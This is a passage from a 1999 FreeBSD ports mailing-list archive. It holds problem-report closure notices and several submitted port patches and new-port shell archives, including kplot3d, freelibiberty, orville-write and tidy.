open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:22:45 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:25: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 33C7C15022; Sat, 4 Dec 1999 15:25:07 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA75785; Sat, 4 Dec 1999 15:25:06 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:25:06 -0800 (PST) From: Message-Id: <199912042325.PAA75785@freefall.freebsd.org> To: mmuir@es.co.nz, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15232: update port: sysutils/wmhm Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update port: sysutils/wmhm State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:24:55 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:26:49 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E761F15543; Sat, 4 Dec 1999 15:26:38 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA75945; Sat, 4 Dec 1999 15:26:18 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:26:18 -0800 (PST) From: Message-Id: <199912042326.PAA75945@freefall.freebsd.org> To: tkato@prontomail.ne.jp, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15225: Update port: mail/balsa Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: mail/balsa State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:26:14 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:30: 2 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 155DB1530A; Sat, 4 Dec 1999 15:29:43 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA76245; Sat, 4 Dec 1999 15:28:52 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:28:52 -0800 (PST) From: Message-Id: <199912042328.PAA76245@freefall.freebsd.org> To: andrews@technologist.com, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15220: update port: sysutils/wmbattery; from v1.9 to v1.10 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update port: sysutils/wmbattery; from v1.9 to v1.10 State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:28:47 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:33:58 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 51EF015423; Sat, 4 Dec 1999 15:33:48 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA76812; Sat, 4 Dec 1999 15:33:08 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:33:08 -0800 (PST) From: Message-Id: <199912042333.PAA76812@freefall.freebsd.org> To: jedgar@fxp.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15217: Update port: news/pan Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: news/pan State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:33:04 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:35: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CC0EA14A10; Sat, 4 Dec 1999 15:35:02 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA77004; Sat, 4 Dec 1999 15:34:54 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:34:54 -0800 (PST) From: Message-Id: <199912042334.PAA77004@freefall.freebsd.org> To: sascha@schumann.cx, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15210: update port: security/mhash Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update port: security/mhash State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:34:42 PST 1999 State-Changed-Why: Update was committed by nsayer, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:41:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8760415383; Sat, 4 Dec 1999 15:41:04 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA77369; Sat, 4 Dec 1999 15:38:39 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:38:39 -0800 (PST) From: Message-Id: <199912042338.PAA77369@freefall.freebsd.org> To: james@ja.ath.cx, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15177: not able to set CC in port, graphics/mpeg2codec Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: not able to set CC in port, graphics/mpeg2codec State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:38:34 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:41:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9A98E154AC; Sat, 4 Dec 1999 15:41:25 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA77672; Sat, 4 Dec 1999 15:40:38 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:40:38 -0800 (PST) From: Message-Id: <199912042340.PAA77672@freefall.freebsd.org> To: jedgar@fxp.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15214: Update port: archivers/lzo Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: archivers/lzo State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:40:33 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:53:26 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 158A9153BF; Sat, 4 Dec 1999 15:53:06 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA78798; Sat, 4 Dec 1999 15:52:20 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:52:20 -0800 (PST) From: Message-Id: <199912042352.PAA78798@freefall.freebsd.org> To: jedgar@fxp.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15245: New port: devel/lincvs Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: devel/lincvs State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:52:13 PST 1999 State-Changed-Why: New port committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 15:53:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8D38815564; Sat, 4 Dec 1999 15:53:35 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA79022; Sat, 4 Dec 1999 15:53:35 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Sat, 4 Dec 1999 15:53:35 -0800 (PST) From: Message-Id: <199912042353.PAA79022@freefall.freebsd.org> To: jedgar@fxp.org, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15233: Update port: graphics/xanim Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/xanim State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Sat Dec 4 15:53:30 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 16:52:42 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3522A14E9D for ; Sat, 4 Dec 1999 16:52:38 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA05253; Sat, 4 Dec 1999 16:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id AC08214E53 for ; Sat, 4 Dec 1999 16:48:46 -0800 (PST) (envelope-from jedgar@pawn.primelocation.net) Received: by pawn.primelocation.net (Postfix, from userid 1003) id 759659B36; Sat, 4 Dec 1999 19:48:35 -0500 (EST) Message-Id: <19991205004835.759659B36@pawn.primelocation.net> Date: Sat, 4 Dec 1999 19:48:35 -0500 (EST) From: jedgar@fxp.org Reply-To: jedgar@fxp.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15261: Update port: graphics/kplot3d Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15261 >Category: ports >Synopsis: Update port: graphics/kplot3d >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 16:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Chris D. Faulhaber >Release: FreeBSD 4.0-CURRENT i386 >Organization: BUGO - BSD Users Group of Orlando >Environment: FreeBSD 4.0-CURRENT i386 >Description: Update port: graphics/kplot3d * Update to 0.70 >How-To-Repeat: >Fix: Index: Makefile =================================================================== RCS file: /home/ncvs/ports/graphics/kplot3d/Makefile,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 Makefile --- Makefile 1999/11/27 14:39:41 1.1.1.1 +++ Makefile 1999/12/04 21:51:49 @@ -1,12 +1,12 @@ # New ports collection makefile for: kplot3d -# Version required: 0.69 +# Version required: 0.70 # Date created: 30 October 1999 # Whom: Chris D. Faulhaber # # $FreeBSD: ports/graphics/kplot3d/Makefile,v 1.1.1.1 1999/11/27 14:39:41 steve Exp $ # -DISTNAME= kplot3d-0.69 +DISTNAME= kplot3d-0.70 CATEGORIES= graphics kde MASTER_SITES= http://members.xoom.com/kplot3d/ @@ -17,5 +17,7 @@ FETCH_BEFORE_ARGS= -b # members.xoom.com is broken USE_QT= yes GNU_CONFIGURE= yes +USE_GMAKE= yes +USE_NEWGCC= yes .include Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/graphics/kplot3d/files/md5,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 md5 --- md5 1999/11/27 14:39:41 1.1.1.1 +++ md5 1999/12/04 21:51:49 @@ -1 +1 @@ -MD5 (kplot3d-0.69.tar.gz) = b282bdca123d015c88dbbda2ef0dfc7e +MD5 (kplot3d-0.70.tar.gz) = d519ba0f0c7c84961bc1355c48d0e75d Index: pkg/PLIST =================================================================== RCS file: /home/ncvs/ports/graphics/kplot3d/pkg/PLIST,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 PLIST --- PLIST 1999/11/27 14:39:41 1.1.1.1 +++ PLIST 1999/12/04 21:51:49 @@ -1,5 +1,6 @@ bin/kplot3d share/applnk/Applications/kplot3d.kdelnk +share/apps/kplot3d/pics/intro.jpg share/doc/HTML/en/kplot3d/index-1.html share/doc/HTML/en/kplot3d/index-2.html share/doc/HTML/en/kplot3d/index-3.html @@ -11,3 +12,5 @@ share/icons/mini/kplot3d.xpm share/locale/ru/LC_MESSAGES/kplot3d.mo @dirrm share/doc/HTML/en/kplot3d +@dirrm share/apps/kplot3d/pics +@dirrm share/apps/kplot3d >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 17:30:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4FCAD15372 for ; Sat, 4 Dec 1999 17:30:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA07253; Sat, 4 Dec 1999 17:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from byzantine.student.umd.edu (byzantine.student.umd.edu [129.2.244.158]) by hub.freebsd.org (Postfix) with ESMTP id 0984715366 for ; Sat, 4 Dec 1999 17:29:06 -0800 (PST) (envelope-from howardjp@byzantine.student.umd.edu) Received: (from howardjp@localhost) by byzantine.student.umd.edu (8.9.3/8.9.3) id UAA52354; Sat, 4 Dec 1999 20:29:46 -0500 (EST) (envelope-from howardjp) Message-Id: <199912050129.UAA52354@byzantine.student.umd.edu> Date: Sat, 4 Dec 1999 20:29:46 -0500 (EST) From: howardjp@wam.umd.edu Reply-To: howardjp@wam.umd.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15263: [PATCH] Updates for devel/freelibiberty Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15263 >Category: ports >Synopsis: [PATCH] Updates for devel/freelibiberty >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 17:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: James Howard >Release: FreeBSD 4.0-CURRENT i386 >Organization: University of Marlyand >Environment: FreeBSD byzantine.student.umd.edu 4.0-CURRENT FreeBSD 4.0-CURRENT #60: Tue Nov 30 10:38:30 EST 1999 howardjp@byzantine.student.umd.edu:/usr/src/sys/compile/BYZANTINE i386 >Description: Updates to freelibiberty based on user contributed fixes, mainly to quiet warnings. >How-To-Repeat: N/A >Fix: diff -ru freelibiberty.orig/Makefile freelibiberty/Makefile --- freelibiberty.orig/Makefile Fri Nov 26 13:42:14 1999 +++ freelibiberty/Makefile Sat Dec 4 20:05:15 1999 @@ -1,13 +1,13 @@ # New ports collection makefile for: free-libiberty -# Version required: 0.1 +# Version required: 0.2 # Date created: 30 October 1999 # Whom: James Howard # # $FreeBSD: ports/devel/freelibiberty/Makefile,v 1.2 1999/11/26 18:42:14 steve Exp $ # -DISTNAME= libiberty-0.1 -PKGNAME= freelibiberty-0.1 +DISTNAME= libiberty-0.2 +PKGNAME= freelibiberty-0.2 CATEGORIES= devel MASTER_SITES= ftp://ftp.wam.umd.edu/pub/howardjp/software/libiberty/ \ http://www.wam.umd.edu/~howardjp/software/libiberty/ \ diff -ru freelibiberty.orig/files/md5 freelibiberty/files/md5 --- freelibiberty.orig/files/md5 Thu Nov 4 22:50:47 1999 +++ freelibiberty/files/md5 Sat Dec 4 20:05:52 1999 @@ -1 +1 @@ -MD5 (libiberty-0.1.tar.gz) = 757eb8df7c271ecf764ca45165645fef +MD5 (libiberty-0.2.tar.gz) = 0d6acad21ac04bb089e00aba2a868dee >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 19: 1: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BF85C153BB for ; Sat, 4 Dec 1999 19:01:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA12319; Sat, 4 Dec 1999 19:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from byzantine.student.umd.edu (byzantine.student.umd.edu [129.2.244.158]) by hub.freebsd.org (Postfix) with ESMTP id 5C66C1521D for ; Sat, 4 Dec 1999 18:56:45 -0800 (PST) (envelope-from howardjp@byzantine.student.umd.edu) Received: (from howardjp@localhost) by byzantine.student.umd.edu (8.9.3/8.9.3) id VAA55671; Sat, 4 Dec 1999 21:59:27 -0500 (EST) (envelope-from howardjp) Message-Id: <199912050259.VAA55671@byzantine.student.umd.edu> Date: Sat, 4 Dec 1999 21:59:27 -0500 (EST) From: howardjp@wam.umd.edu Reply-To: howardjp@wam.umd.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15264: New port: sysutils/orville-write Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15264 >Category: ports >Synopsis: New port: sysutils/orville-write >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 19:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: James Howard >Release: FreeBSD 4.0-CURRENT i386 >Organization: University of Maryland >Environment: FreeBSD byzantine.student.umd.edu 4.0-CURRENT FreeBSD 4.0-CURRENT #60: Tue Nov 30 10:38:30 EST 1999 howardjp@byzantine.student.umd.edu:/usr/src/sys/compile/BYZANTINE i386 >Description: Orville Write is a massive rewrite and upgrade of the standard UNIX write program. It supports blocking users, single line "telegrams" and lots of other cool things. It is often used in conjunction with party (see ports/15258). >How-To-Repeat: N/A >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # orville-write/ # orville-write/pkg # orville-write/pkg/COMMENT # orville-write/pkg/DESCR # orville-write/pkg/PLIST # orville-write/files # orville-write/files/md5 # orville-write/Makefile # orville-write/patches # orville-write/patches/patch-aa # echo c - orville-write/ mkdir -p orville-write/ > /dev/null 2>&1 echo c - orville-write/pkg mkdir -p orville-write/pkg > /dev/null 2>&1 echo x - orville-write/pkg/COMMENT sed 's/^X//' >orville-write/pkg/COMMENT << 'END-of-orville-write/pkg/COMMENT' XAdvanced replacement for write/mesg END-of-orville-write/pkg/COMMENT echo x - orville-write/pkg/DESCR sed 's/^X//' >orville-write/pkg/DESCR << 'END-of-orville-write/pkg/DESCR' XThis implementation of the Unix write program adds many nice features Xwhile remaining close to the standard Unix program in spirit. It has been Xheavily used on M-Net since 1985 and on Grex since 1991, as well as a few Xother systems. It is a ground-up reimplementation using no proprietary Xcode. It's available under a Berkeley-style license (no charge, no Xrestriction on commercial use, just don't take my name off of it). The Xcurrent version is fairly portable. X XOrville write was written for use on M-Net and Grex, both public access Xunix systems in Ann Arbor. As such, many of the features are designed to Xsupport a system featuring a delicate mix of novice users and hostile Xpranksters, plus a lot of people who just want to talk. It's user Xinterface is pretty much identical to the normal write program, but it Xoffers many extensions and improvements. END-of-orville-write/pkg/DESCR echo x - orville-write/pkg/PLIST sed 's/^X//' >orville-write/pkg/PLIST << 'END-of-orville-write/pkg/PLIST' X@owner root X@group tty X@cd /usr/local Xbin/write Xbin/amin Xbin/helpers Xbin/mesg Xbin/huh Xbin/tel Xbin/chat Xetc/wrttab END-of-orville-write/pkg/PLIST echo c - orville-write/files mkdir -p orville-write/files > /dev/null 2>&1 echo x - orville-write/files/md5 sed 's/^X//' >orville-write/files/md5 << 'END-of-orville-write/files/md5' XMD5 (orville-write-2.41a.tar.gz) = 86efe9e958385a2fe4098ecab09ea2da END-of-orville-write/files/md5 echo x - orville-write/Makefile sed 's/^X//' >orville-write/Makefile << 'END-of-orville-write/Makefile' X# New ports collection makefile for: orville-write X# Version required: 2.41a X# Date created: 4 December 1999 X# Whom: James Howard X# X# $FreeBSD$ X# X XDISTNAME= orville-write-2.41a XPKGNAME= orville-write-2.41a XCATEGORIES= misc XMASTER_SITES= http://www.wwnet.net/~janc/software/ X XMAINTAINER= howardjp@wam.umd.edu X XMAN1= amin.1 helpers.1 huh.1 mesg.1 write.1 tel.1 chat.1 X Xdo-install: X ${INSTALL_SCRIPT} -g tty -o root -m 6711 ${WRKSRC}/write ${PREFIX}/bin X ${INSTALL_SCRIPT} -o root -m 4711 ${WRKSRC}/mesg ${PREFIX}/bin X ${INSTALL_SCRIPT} -o root -m 4711 ${WRKSRC}/amin ${PREFIX}/bin X ${INSTALL_SCRIPT} -o root -m 4711 ${WRKSRC}/huh ${PREFIX}/bin X ${INSTALL_SCRIPT} -o root -m 4711 ${WRKSRC}/helpers ${PREFIX}/bin X ${INSTALL_SCRIPT} -g tty -o root -m 6711 ${WRKSRC}/write ${PREFIX}/bin/tel X ${INSTALL_SCRIPT} -g tty -o root -m 6711 ${WRKSRC}/write ${PREFIX}/bin/chat X ${TOUCH} /var/run/wrttmp X ${TOUCH} /var/run/wrthist X ${TOUCH} /var/log/writelog X ${INSTALL_SCRIPT} ${WRKSRC}/wrttab ${PREFIX}/etc/wrttab X ${INSTALL_SCRIPT} ${WRKSRC}/amin.1 ${PREFIX}/man/man1/ X ${INSTALL_SCRIPT} ${WRKSRC}/helpers.1 ${PREFIX}/man/man1/ X ${INSTALL_SCRIPT} ${WRKSRC}/huh.1 ${PREFIX}/man/man1/ X ${INSTALL_SCRIPT} ${WRKSRC}/write.1 ${PREFIX}/man/man1/ X ${INSTALL_SCRIPT} ${WRKSRC}/mesg.1 ${PREFIX}/man/man1/ X ${INSTALL_SCRIPT} ${WRKSRC}/chat.1 ${PREFIX}/man/man1/ X ${INSTALL_SCRIPT} ${WRKSRC}/tel.1 ${PREFIX}/man/man1/ X Xpost-extract: X @(cd ${WRKSRC}; ${RM} -f .depend) X X.include END-of-orville-write/Makefile echo c - orville-write/patches mkdir -p orville-write/patches > /dev/null 2>&1 echo x - orville-write/patches/patch-aa sed 's/^X//' >orville-write/patches/patch-aa << 'END-of-orville-write/patches/patch-aa' X--- Makefile.orig Sat Dec 4 21:21:35 1999 X+++ Makefile Sat Dec 4 21:12:51 1999 X@@ -1,14 +1,13 @@ X # M-Net Settings - BSDI Unix on a 486 box X-#CFLAGS=-DBSD -DDISCONNECT -DTTY_GROUP \ X-# -DWRTTMP='"/etc/wrttmp"' \ X-# -DWRTHIST='"/etc/wrthist"' \ X-# -DWRTTAB='"/etc/wrttab"' \ X-# -DHELPERS='"/etc/helpers"' \ X-# -DLOG='"/var/log/writelog"' \ X-# -DHELPLOG='"/var/log/writehlog"' \ X-# -DUTMP='"/var/run/utmp"' \ X-# -DNOVICEHELP='"/usr/lib/write.help"' X-#LIB= X+CFLAGS=-DBSD -DDISCONNECT -DTTY_GROUP \ X+ -DWRTTMP='"/var/run/wrttmp"' \ X+ -DWRTHIST='"/var/run/wrthist"' \ X+ -DWRTTAB='"/usr/local/etc/wrttab"' \ X+ -DLOG='"/var/log/writelog"' \ X+ -DUTMP='"/var/run/utmp"' \ X+ -DNOVICEHELP='"/usr/lib/write.help"' \ X+ -DNOGETUTENT X+LIB=-lcrypt X X # Grex Settings - SunOs on some old sun 4 X #CC=gcc X@@ -28,17 +27,17 @@ X #LIB= -lshadow X X # My new development system -- Linux -- debugging setup X-CFLAGS=-g -DBSD -DDISCONNECT -DTTY_GROUP \ X- -DWRTTMP='"/home/janc/src/write/wrttmp"' \ X- -DWRTHIST='"/home/janc/src/write/wrthist"' \ X- -DWRTTAB='"/home/janc/src/write/wrttab"' \ X- -DHELPERS='"/home/janc/src/write/helperfile"' \ X- -DEXCEPTIONS \ X- -DLOG='"/home/janc/src/write/writelog"' \ X- -DHELPLOG='"/home/janc/src/write/writehlog"' \ X- -DNOVICEHELP='"/home/janc/src/write/write.help"' \ X- -DNOHELPER='"/home/janc/src/write/write.nohelper"' X-LIB= X+#CFLAGS=-g -DBSD -DDISCONNECT -DTTY_GROUP \ X+# -DWRTTMP='"/home/janc/src/write/wrttmp"' \ X+# -DWRTHIST='"/home/janc/src/write/wrthist"' \ X+# -DWRTTAB='"/home/janc/src/write/wrttab"' \ X+# -DHELPERS='"/home/janc/src/write/helperfile"' \ X+# -DEXCEPTIONS \ X+# -DLOG='"/home/janc/src/write/writelog"' \ X+# -DHELPLOG='"/home/janc/src/write/writehlog"' \ X+# -DNOVICEHELP='"/home/janc/src/write/write.help"' \ X+# -DNOHELPER='"/home/janc/src/write/write.nohelper"' X+#LIB= X X # My old development system -- NeXT -- debugging setup X #CFLAGS=-g -DBSD -DDISCONNECT -DTTY_GROUP \ END-of-orville-write/patches/patch-aa exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 19:30:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 97FA71513C for ; Sat, 4 Dec 1999 19:30:55 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA14412; Sat, 4 Dec 1999 19:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from nwhn-sh14-port133.snet.net (nwhn-sh14-port133.snet.net [204.60.49.133]) by hub.freebsd.org (Postfix) with SMTP id 6A63B1508F for ; Sat, 4 Dec 1999 19:26:27 -0800 (PST) (envelope-from saken@hotel.rmta.org) Received: (qmail 8620 invoked by uid 1001); 5 Dec 1999 03:26:06 -0000 Message-Id: <19991205032606.8619.qmail@hotel.rmta.org> Date: 5 Dec 1999 03:26:06 -0000 From: saken@hotel.rmta.org Reply-To: saken@hotel.rmta.org To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15266: UPDATE: ports/www/tidy to Nov 30 version Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15266 >Category: ports >Synopsis: UPDATE: ports/www/tidy to Nov 30 version >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 19:30:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Scott A. Kenney >Release: FreeBSD 4.0-CURRENT i386 >Organization: Agent's of Fortune, LTD >Environment: FreeBSD nwhn-sh14-port133.snet.net 4.0-CURRENT FreeBSD 4.0-CURRENT #15: Wed Sep 29 22:05:38 EDT 1999 >Description: Update ports/www/tidy to latest version (I am the port maintainer) >How-To-Repeat: N/A >Fix: Apply the following patch to ports/www/tidy: diff -ruN tidy/Makefile tidy.new/Makefile --- tidy/Makefile Sat Dec 4 22:05:20 1999 +++ tidy.new/Makefile Sat Dec 4 22:08:04 1999 @@ -6,8 +6,8 @@ # $FreeBSD: ports/www/tidy/Makefile,v 1.13 1999/11/21 01:17:41 cpiazza Exp $ # -DISTNAME= tidy22oct99 -PKGNAME= tidy-0.10.99.1 +DISTNAME= tidy30nov99 +PKGNAME= 